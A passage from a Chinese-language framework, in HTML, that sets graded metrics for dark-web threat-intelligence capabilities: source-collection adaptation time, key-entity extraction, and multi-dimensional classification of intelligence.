leaf="">的支撑作用。通过设定科学合理的量化阈值，确保指标兼具科学性与可操作性，能够客观体现采集效果优化层面的真实能力差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.4.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集效果优化以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">旧源波动或新源发现时的采集优化时间</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="163" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="278" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="127" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="163" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集效果优化</span></span></p></td><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">旧源波动或新源发现时，采集优化时间 &lt; 24小时</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">旧源波动或新源发现时，采集优化时间 &lt; 6小时</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">旧源波动或新源发现时，采集优化时间 &lt; 1小时</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估在面对 Dark Web Lite 威胁源波动或新源出现时的快速适配能力。通过量化采集优化时间，可客观反映动态环境下的采集稳定性和连续性，为 Dark Web Lite 威胁源采集的长期可靠性和实战效能提供重要技术支撑。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第五章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">暗网情报智能分析能力</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报智能分析是暗网威胁情报全链路体系中的核心能力环节，承接前端多源威胁情报采集成果，面向 Traditional Dark Web 与 Dark Web Lite 双生态的海量异构数据，实现威胁识别、实体提取、分类分级、关联挖掘与知识化呈现。该环节以人工智能、自然语言处理、向量检索与知识图谱技术为支撑，解决暗网情报非结构化、碎片化、高噪声、强隐蔽等难题，是提升威胁研判精准度、响应时效性与溯源完整性的关键支撑。本章立足暗网生态数据特征与实战化研判需求，从关键实体信息提取、情报分级分类、情报分析时效性、多维度向量检索、情报知识图谱构建五个维度，建立暗网情报智能分析能力量化评估体系，全面衡量对暗网威胁数据的自动化处理、深度挖掘、精准研判与智能关联能力，为暗网威胁预警、事件溯源与安全运营提供标准化、可量化的分析能力依据。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">5.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">关键实体信息提取</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">关键实体信息提取是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报智能分析能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础性核心指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估从海量原始情报中自动识别与提取关键实体的能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁源中蕴含大量分散的实体信息，主要包括</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">发布者、组织标识、Telegram 账号、邮箱地址、事件标题、事件内容、发布时间、威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等。若无法有效提取上述关键实体，将难以把零散的原始数据转化为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">结构化、可关联</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的情报成果，进而影响后续情报分级分类、知识图谱构建以及风险预警的准确性与处置效率。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察对关键实体的自动提取能力，以及在威胁源波动场景下的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">自动关联与更新能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">直接决定暗网情报从原始数据向可行动情报转化的效率</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为风险评估与响应决策提供可靠的基础支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的实际数据特征与分析需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁源普遍存在</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">波动频繁</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的特征，各类黑客论坛、勒索组织泄露站点等高频次因执法行动、主动迁移、地址轮换等原因发生域名或访问路径变更。当威胁源出现波动时，若无法实现波动前后的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实体自动关联</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，将产生大量重复数据与冗余信息，严重影响情报质量与后续分析效率。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">关键实体信息提取的完整性与自动化程度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，重点评估从多源原始情报中自动识别与提取关键实体的能力，并着重强调威胁源波动场景下的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">自动关联更新</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">能力。通过设定科学合理的分级阈值，确保指标能够客观体现情报分析基础能力层面的真实差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">关键实体信息提取以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">关键实体的自动提取能力和关联能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="99" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="379" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="91" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="99" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">关键实体信息提取</span></span></p></td><td data-colwidth="379" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">可自动提取部分威胁源或部分关键实体信息</span></span></p></td><td data-colwidth="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="379" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">自动提取全部威胁源中的关键实体（发布者、Telegram账号、邮箱地址、事件标题、事件内容、发布时间、威胁源）</span></span></p></td><td data-colwidth="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="379" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">自动提取全部威胁源中的关键实体（发布者、Telegram账号、邮箱地址、事件标题、事件内容、发布时间、威胁源），并支持威胁源波动时的自动关联</span></span></p></td><td data-colwidth="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估从暗网原始情报中自动识别和提取关键实体的能力。通过量化实体提取的完整性和在威胁源波动时的关联更新能力，可客观反映在情报分析基础环节的处理水平，为后续分级分类、向量检索和知识图谱构建提供重要数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">5.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">情报分级分类</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报分级分类是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报智能分析能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">核心指标之一</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估对海量暗网情报进行系统化分级与分类的能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，实现情报价值的精准区分与高效流转。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数量庞大、类型繁杂、价值不均</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的特征，若无法对情报开展有效的分级分类，将难以区分不同情报的紧急程度、影响范围与威胁等级，极易导致高价值关键威胁被淹没在海量冗余数据中，无法为相关主体提供精准的风险预警与决策支撑。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察对情报</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">价值等级、受影响国家、受影响主体、归属行业、事件类型</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等多维度的分级分类能力，该项能力</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">直接决定情报分析的效率与准确性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续风险评估、事件研判与应急处置提供清晰的优先级指引，保障威胁响应的针对性与时效性。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">暗网情报</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的实际数据特征与分析需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">从行业实际应用现状来看，全球范围内半数以上涉足暗网情报领域的相关机构，尚未对情报开展有效的分级分类工作，大部分机构仅能完成受影响国家与受影响主体的粗浅分类；仅有少数行业头部机构，能够实现情报的细致、规范、可操作的分级分类，这一现状充分体现了情报分级分类工作的实操难度。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">造成该工作难度较高的核心原因，在于暗网情报本身具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量性、非结构化、碎片化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的显著特征，采用人工分类或简单规则匹配的方式，难以达到理想的分类效果，且效率低下、误差较大。唯有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">成熟运用人工智能相关技术</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，才能实现对情报</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">价值等级、受影响国家、受影响主体、归属行业、事件类型</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等多维度的精准、高效分级分类。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报分级分类的自动化程度与多维度覆盖完整性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，通过科学设定分级阈值，确保指标能够客观、真实地反映在情报分析核心能力上的实际差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报分级分类以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">分级分类的自动化程度和维度覆盖范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="99" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="379" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="91" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="99" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报分级分类</span></span></p></td><td data-colwidth="379" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">未进行系统化或明确的分级分类</span></span></p></td><td data-colwidth="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="379" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">进行部分情报的分级分类，主要包括受影响国家、受影响企业</span></span></p></td><td data-colwidth="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="379" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">成熟运用AI技术实现全自动化暗网情报分级分类，支持情报价值、受影响国家、受影响企业、归属行业、事件类型等多维度评估</span></span></p></td><td data-colwidth="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对暗网情报进行系统化分级与分类的能力。通过量化分级分类的自动化程度和维度覆盖范围，可客观反映情报分析环节的智能化水平，为后续的风险评估、事件研判以及应急处置工作，提供清晰的优先级指引，确保研判工作高效、精准开展。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">5.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">情报分析时效性</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报分析时效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报智能分析能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">关键指标之一</span></strong></span><span 